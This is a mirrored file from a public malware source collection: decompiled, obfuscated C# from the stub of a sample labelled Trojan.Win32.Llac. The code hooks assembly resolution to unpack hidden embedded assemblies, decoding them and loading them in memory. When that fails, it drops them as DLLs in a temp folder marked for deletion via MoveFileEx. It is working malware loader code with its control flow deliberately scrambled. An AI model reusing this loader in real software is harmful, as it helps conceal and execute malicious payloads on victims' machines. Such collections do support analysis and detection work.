mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 13:25:30 +00:00
298 lines
8.9 KiB
C#
298 lines
8.9 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: Stub, Version=10.1.0.54, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: B6CAF90E-24AA-429E-AF0C-6337F759D114
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Llac.ahnf-1467840597eb1f4ba0b638f6a268d113b70fcfcdf65f9ac2457fdfea55b1e336.exe
|
|||
|
|
|||
|
using \u0003;
|
|||
|
using \u0004;
|
|||
|
using System;
|
|||
|
using System.Collections;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
namespace \u0004
|
|||
|
{
|
|||
|
internal class \u0002
|
|||
|
{
|
|||
|
private static Hashtable \u0001 = new Hashtable();
|
|||
|
|
|||
|
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
|
|||
|
private static extern bool \u0002([In] string obj0, [In] string obj1, [In] int obj2);
|
|||
|
|
|||
|
internal static void \u0002()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0002.\u0002);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal static Assembly \u0002([In] object obj0, [In] ResolveEventArgs obj1)
|
|||
|
{
|
|||
|
\u0002.\u0001 obj = new \u0002.\u0001(obj1.Name);
|
|||
|
string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0002(false)));
|
|||
|
string[] strArray;
|
|||
|
string str1;
|
|||
|
bool flag1;
|
|||
|
bool flag2;
|
|||
|
int index1;
|
|||
|
if (true)
|
|||
|
{
|
|||
|
strArray = "ezJmNmJkMmIyLTYxYjEtNDg2Yi05MGE1LTdmMTFhOWIwYzVjM30sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{2f6bd2b2-61b1-486b-90a5-7f11a9b0c5c3},e2FmNWJjNTA3LTk1MTktNDk3NS1hYzNjLWYyMTA2OTEzYjhiYX0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{af5bc507-9519-4975-ac3c-f2106913b8ba},ezI1ZGFkYzZlLTRhNmEtNGExYy1hODJjLWJlMGJiMzU3ZGJjYX0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{25dadc6e-4a6a-4a1c-a82c-be0bb357dbca},e2E4N2I2MjU4LWNkNTYtNDdmZC1iNTU2LTY4ZDY1NzIwNTJiM30sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{a87b6258-cd56-47fd-b556-68d6572052b3},e2YyNTc4ZTA0LTUzZDEtNGE2Ni1iZGJlLTEzMDY2MDZmMDMxYn0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{f2578e04-53d1-4a66-bdbe-1306606f031b}".Split(',');
|
|||
|
str1 = string.Empty;
|
|||
|
flag1 = false;
|
|||
|
flag2 = false;
|
|||
|
index1 = 0;
|
|||
|
goto label_6;
|
|||
|
}
|
|||
|
else
|
|||
|
goto label_18;
|
|||
|
label_3:
|
|||
|
int num1;
|
|||
|
if (num1 != 0)
|
|||
|
{
|
|||
|
str1 = strArray[index1 + 1];
|
|||
|
goto label_9;
|
|||
|
}
|
|||
|
else
|
|||
|
index1 += 2;
|
|||
|
label_6:
|
|||
|
int num2 = index1;
|
|||
|
int num3 = strArray.Length;
|
|||
|
int num4 = num2;
|
|||
|
label_7:
|
|||
|
int num5 = num3 - 1;
|
|||
|
label_8:
|
|||
|
if (num4 < num5)
|
|||
|
{
|
|||
|
num1 = strArray[index1] == base64String ? 1 : 0;
|
|||
|
goto label_3;
|
|||
|
}
|
|||
|
label_9:
|
|||
|
if (str1.Length == 0 && obj.\u0003.Length == 0)
|
|||
|
base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0001));
|
|||
|
else
|
|||
|
goto label_16;
|
|||
|
label_11:
|
|||
|
for (int index2 = 0; index2 < strArray.Length - 1; index2 += 2)
|
|||
|
{
|
|||
|
if (strArray[index2] == base64String)
|
|||
|
{
|
|||
|
str1 = strArray[index2 + 1];
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
label_16:
|
|||
|
if (true)
|
|||
|
{
|
|||
|
if (str1.Length <= 0)
|
|||
|
goto label_43;
|
|||
|
}
|
|||
|
else
|
|||
|
goto label_11;
|
|||
|
label_18:
|
|||
|
num4 = (int) str1[0];
|
|||
|
num3 = 0;
|
|||
|
if (num3 == 0)
|
|||
|
{
|
|||
|
if (num3 != 0)
|
|||
|
{
|
|||
|
num1 = num4;
|
|||
|
goto label_3;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
if (num4 == 91)
|
|||
|
{
|
|||
|
int num6 = str1.IndexOf(']');
|
|||
|
string str2 = str1.Substring(1, num6 - 1);
|
|||
|
int num7 = str2.IndexOf('z');
|
|||
|
int num8 = 0;
|
|||
|
if (num8 != 0)
|
|||
|
{
|
|||
|
num5 = num8;
|
|||
|
num4 = num7;
|
|||
|
goto label_8;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
flag1 = num7 >= num8;
|
|||
|
flag2 = str2.IndexOf('t') >= 0;
|
|||
|
str1 = str1.Substring(num6 + 1);
|
|||
|
}
|
|||
|
}
|
|||
|
lock (\u0002.\u0001)
|
|||
|
{
|
|||
|
label_25:
|
|||
|
int num9;
|
|||
|
for (int index3 = \u0002.\u0001.ContainsKey((object) str1) ? 1 : 0; index3 == 0; index3 = num9)
|
|||
|
{
|
|||
|
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
|
|||
|
if (manifestResourceStream != null)
|
|||
|
{
|
|||
|
int length = (int) manifestResourceStream.Length;
|
|||
|
byte[] numArray = new byte[length];
|
|||
|
manifestResourceStream.Read(numArray, 0, length);
|
|||
|
if (flag1)
|
|||
|
numArray = \u0002.\u0002(numArray);
|
|||
|
Assembly assembly;
|
|||
|
do
|
|||
|
{
|
|||
|
assembly = (Assembly) null;
|
|||
|
if (!flag2)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
assembly = Assembly.Load(numArray);
|
|||
|
}
|
|||
|
catch (FileLoadException ex)
|
|||
|
{
|
|||
|
flag2 = true;
|
|||
|
}
|
|||
|
catch (BadImageFormatException ex)
|
|||
|
{
|
|||
|
flag2 = true;
|
|||
|
}
|
|||
|
}
|
|||
|
if (flag2)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string path1 = string.Format("{0}{1}\\", (object) Path.GetTempPath(), (object) str1);
|
|||
|
Directory.CreateDirectory(path1);
|
|||
|
string path2 = path1 + obj.\u0001 + ".dll";
|
|||
|
if (!File.Exists(path2))
|
|||
|
{
|
|||
|
FileStream fileStream = File.OpenWrite(path2);
|
|||
|
fileStream.Write(numArray, 0, numArray.Length);
|
|||
|
fileStream.Close();
|
|||
|
\u0002.\u0002(path2, (string) null, 4);
|
|||
|
\u0002.\u0002(path1, (string) null, 4);
|
|||
|
}
|
|||
|
assembly = Assembly.LoadFile(path2);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
num9 = -1;
|
|||
|
if (num9 == 0)
|
|||
|
goto label_25;
|
|||
|
}
|
|||
|
while (num9 == 0);
|
|||
|
\u0002.\u0001[(object) str1] = (object) assembly;
|
|||
|
return assembly;
|
|||
|
}
|
|||
|
goto label_43;
|
|||
|
}
|
|||
|
return (Assembly) \u0002.\u0001[(object) str1];
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
goto label_7;
|
|||
|
label_43:
|
|||
|
if (true)
|
|||
|
return (Assembly) null;
|
|||
|
goto label_9;
|
|||
|
}
|
|||
|
|
|||
|
internal struct \u0001
|
|||
|
{
|
|||
|
public string \u0001;
|
|||
|
public Version \u0001;
|
|||
|
public string \u0002;
|
|||
|
public string \u0003;
|
|||
|
|
|||
|
public string \u0002([In] bool obj0)
|
|||
|
{
|
|||
|
StringBuilder stringBuilder = new StringBuilder();
|
|||
|
stringBuilder.Append(this.\u0001);
|
|||
|
label_11:
|
|||
|
int num1 = obj0 ? 1 : 0;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
if (num1 != 0)
|
|||
|
{
|
|||
|
int num2 = this.\u0001 != (Version) null ? 1 : 0;
|
|||
|
if (false)
|
|||
|
num1 = num2;
|
|||
|
else if (num2 == 0)
|
|||
|
goto label_4;
|
|||
|
else
|
|||
|
goto label_13;
|
|||
|
}
|
|||
|
else
|
|||
|
goto label_4;
|
|||
|
}
|
|||
|
goto label_5;
|
|||
|
label_4:
|
|||
|
stringBuilder.Append(", Culture=");
|
|||
|
num1 = 0;
|
|||
|
label_5:
|
|||
|
if (num1 == 0)
|
|||
|
{
|
|||
|
while (true)
|
|||
|
{
|
|||
|
if (true)
|
|||
|
{
|
|||
|
if (true)
|
|||
|
{
|
|||
|
stringBuilder.Append(this.\u0002.Length == 0 ? "neutral" : this.\u0002);
|
|||
|
stringBuilder.Append(", PublicKeyToken=");
|
|||
|
stringBuilder.Append(this.\u0003.Length == 0 ? "null" : this.\u0003);
|
|||
|
goto label_10;
|
|||
|
}
|
|||
|
else
|
|||
|
goto label_11;
|
|||
|
}
|
|||
|
}
|
|||
|
goto label_13;
|
|||
|
}
|
|||
|
label_10:
|
|||
|
return stringBuilder.ToString();
|
|||
|
label_13:
|
|||
|
stringBuilder.Append(", Version=");
|
|||
|
stringBuilder.Append((object) this.\u0001);
|
|||
|
goto label_4;
|
|||
|
}
|
|||
|
|
|||
|
public \u0001([In] string obj0)
|
|||
|
{
|
|||
|
this.\u0001 = (Version) null;
|
|||
|
this.\u0002 = string.Empty;
|
|||
|
this.\u0003 = string.Empty;
|
|||
|
this.\u0001 = string.Empty;
|
|||
|
string str1 = obj0;
|
|||
|
char[] chArray = new char[1]{ ',' };
|
|||
|
foreach (string str2 in str1.Split(chArray))
|
|||
|
{
|
|||
|
string str3 = str2.Trim();
|
|||
|
if (str3.StartsWith("Version="))
|
|||
|
this.\u0001 = new Version(str3.Substring(8));
|
|||
|
else if (str3.StartsWith("Culture="))
|
|||
|
{
|
|||
|
this.\u0002 = str3.Substring(8);
|
|||
|
if (this.\u0002 == "neutral")
|
|||
|
this.\u0002 = string.Empty;
|
|||
|
}
|
|||
|
else if (str3.StartsWith("PublicKeyToken="))
|
|||
|
{
|
|||
|
this.\u0003 = str3.Substring(15);
|
|||
|
if (this.\u0003 == "null")
|
|||
|
this.\u0003 = string.Empty;
|
|||
|
}
|
|||
|
else
|
|||
|
this.\u0001 = str3;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|